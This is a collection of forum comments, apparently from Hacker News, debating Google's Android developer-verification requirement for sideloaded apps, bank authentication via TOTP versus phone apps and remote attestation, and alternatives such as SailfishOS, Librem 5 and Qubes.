Even though Google has not revoked similar controversial policies in the past, we do our best as much as we can. This change particularly threatens the freedom to build, share, and use software without giving away sensitive personal information. It affects independent developers, FOSS contributors, and even regular users who want to install apps outside of Google Play.
"Just imagine giving sensitive personal, government-issued ID to a corporation to install an app outside Google Play"
Let’s stand together to protect our freedom to create and use software without handing over personal information to a corporation. Every signature, share, and voice counts here
Support the petition here: https://chng.it/tyHZjstxWQ
> I really would like to have been payed
> to use Windows phones
I meant paid in the indirect sense of being the beneficiary of a loss leader for Microsoft.
I.e. I'm poking holes in your (somewhat unstated) premise that they'd already reached around 10% of marketshare, and could have just organically grown from there. As reporting at the time shows[1] the average selling price of these phones was €72.4.
So Microsoft (Nokia, but we all know who was really running/paying for the show) were spending a lot of money to buy themselves into the market, and just barely holding on to double digit market share for a bit there by subsidizing entry level phones.
1. https://www.theguardian.com/technology/2013/oct/01/microsoft...
I thought that was what you meant too? If you mean TOTP via a QR code exposing the secret, then of course I agree, no banks allow that. But your comment read as a claim that all TOTP solutions were inherently deemed insecure and wouldn't work, and that smartphone based solutions were the only viable alternative outside the US. The code display is of course vulnerable to man-in-the-middle attacks where you trick users into authorizing transactions via fake web pages, but it is not a threat that is deemed serious enough to prevent our whole country from basing our digital infrastructure on code displays.
I think people get hung up on your point about banks not accepting browsers because you don't formulate your point very clearly, and it reads like you claim that they don't accept browsers at all when what you mean is just a browser and nothing else. Most European banks do in fact allow you to do business using a browser - you just have to prove your identity via other means as well. And there are no good security arguments why those means must be in the form of a smartphone app whose security requirements have the side effect of locking you into a business relationship with one of two American tech giants. As you can see, a whole country of almost six million people authenticates everything from bank transactions to naming their kids and buying houses using a system which allows you to use just a code display.
I think the strategy of remote attestation of the whole OS stack up to and including the window manager is a clunky and inelegant approach from an engineering perspective, and from a freedom perspective I think it is immoral and should be illegal. What I could accept would be an on-phone security module with locked down firmware which can simply take control of the whole screen regardless of what the OS is doing, with a clear indicator of when it is active. This allows you to authorize transactions and inspect their contents, and only needs remote attestation of the security module, not the whole OS.
And it does exist: https://en.wikipedia.org/wiki/Librem_5
https://www.dr.dk/nyheder/seneste/mitid-kan-digitalt-udelukk...
So my guess is that this is not because they think TOTP is secure enough but rather due to the political aspects of it being centrally run by the government.
The security argument is pretty straightforward and I guess you know it already, because as you say, TOTP is vulnerable to phishing (unless you use some of the anti-bot tech I mentioned elsewhere but it's heuristic and not really robust over the long term). Whereas if you do stuff via an app, not only can malware not authorize transactions, but it can't view your financial details either - privacy being a major plank of financial security that can't be reliably offered via desktop browsers at all, but can via phones.
The alternative you propose is basically a secure hypervisor. Such schemes have been implemented in the past, but it's not ideal technically. For fast payment authorization via NFC, this is actually how it works, which is why when you touch a phone to a terminal to pay for something you don't see any details of the transaction on the display itself, just an animation. The OS doesn't get involved in the transaction at all, it's all handled by the embedded credit card smartcard which is hard-wired to the NFC radio. The OS gets notified and can send configuration messages, but that's about it.
For anything more complex the parallel world still needs to be a full OS that boots up, have display drivers, have touchscreen drivers, text rendering, a network stack, a way to update that software, etc. You end up with a second copy of Android and dual booting, which makes memory pressure intolerable and the devices more expensive. But it's hard to justify that when the base phone OS has become secure enough! It's already multi-tasking and isolating worlds from each other. There are no users outside of HN/Slashdot who would find this arrangement preferable. And as your concern is not fully technical, it's not clear why moving the hardware enforcement around a bit from kernel supervisor to hypervisor would make any difference. This isn't something that can be analyzed technically as it all seems to boil down to fear over the loss of ad blocking.
You have the power to help turn a passionate subset of people away from Android, and now is the best time to do it. Instead of scattering effort into a dozen fragmented experiments, let’s rally around the best bet we have right now: SailfishOS. I'm not at all affiliated with Sailfish, just someone pissed off and am trying to point folks at the most mature alternative out there. I know it has its problems. I know there's even better alternatives that even less people use but seriously, rather than fragment the frustration around android right now, please, just try to rally around a serious legit alternative. We might actually make meaningful change here but it needs focus.
Intro for developers: https://docs.sailfishos.org/Develop/
Getting started guide: https://sailfishos.org/wiki/SailfishOS
Let’s push for something truly independent
No single app has access to any data thanks to hardware-assisted virtualization. Last time a VM escape in the modern Qubes implementation was discovered in 2006 by the Qubes founder: https://en.wikipedia.org/wiki/Blue_Pill_(software).
I could be wrong:
https://developer.android.com/developer-verification
"For student and hobbyist developers
We're committed to keeping Android an open platform for you to learn, experiment, and build for fun. We recognize that your needs are different from commercial developers, so we're working on a separate type of Android Developer Console account for you. We'll share more information in the coming months."
Will "verification" also be required for "hobbyists", otherwise known as computer owners, or "ad targets" in Google's framing of the www? Who knows.
Putting restrictions on distributing bad software ("malware") to others is one thing. It makes sense. But putting restrictions on computer owners ("hobbyists") who write, compile and run software on their own computers is another thing entirely.
https://grapheneos.org/articles/attestation-compatibility-gu...
There needs to be a point where enough is enough, and locking down devices so that you cannot install programs nor practically use custom operating systems on them anymore is way past that line.
[1]: https://palant.info/2023/01/02/south-koreas-online-security-...
[2]: https://ee.kaist.ac.kr/en/research-achieve/in-south-korea-ma...